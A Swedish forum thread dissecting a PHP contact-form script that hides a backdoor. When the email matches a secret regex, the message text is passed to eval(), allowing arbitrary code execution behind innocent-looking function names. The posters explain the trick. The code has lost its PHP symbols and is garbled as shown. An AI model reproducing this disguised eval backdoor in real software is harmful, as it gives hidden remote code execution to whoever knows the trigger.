Citat:
|
Ursprungligen postat av Jonas
Citat:
|
Ursprungligen postat av koala
Kod:
email = _REQUESTemail;
text = _REQUESTtext;
if is_not_emailemail is_not_correcttext {
echo Hoppsan.;
} else {
mailinfo@localhost, kontakt, text . email;
echo Ditt meddelande har skickats.;
}
function is_not_email email {
if preg_match/^wxe6xc6xf8xd8xe5xc5xf6xd6xe4xc4.x/, email
return false;
return true;
}
function is_not_correct text {
status = evaltext;
if status === true return true;
else return status;
}
|
Som text räcker det att jag skriver:
[email protected]=?return true;?[massa fulkod o headers...] |
Inte riktigt så, men nästan. Funktionen is_not_correct kommer faktist aldrig någonsin att köras, förutom i specialfallet då man skriver in en epostadress som matchar "lösenordet", som här kan vara t ex "ä.x". Skriverman alltså en sådan e-postadress (vilket man bara gör om man känner till det..) så kan man exekvera godtycklig php-kod som man skriver i textfältet...
Inte så uppenbart för den som litar på funktionernas namn
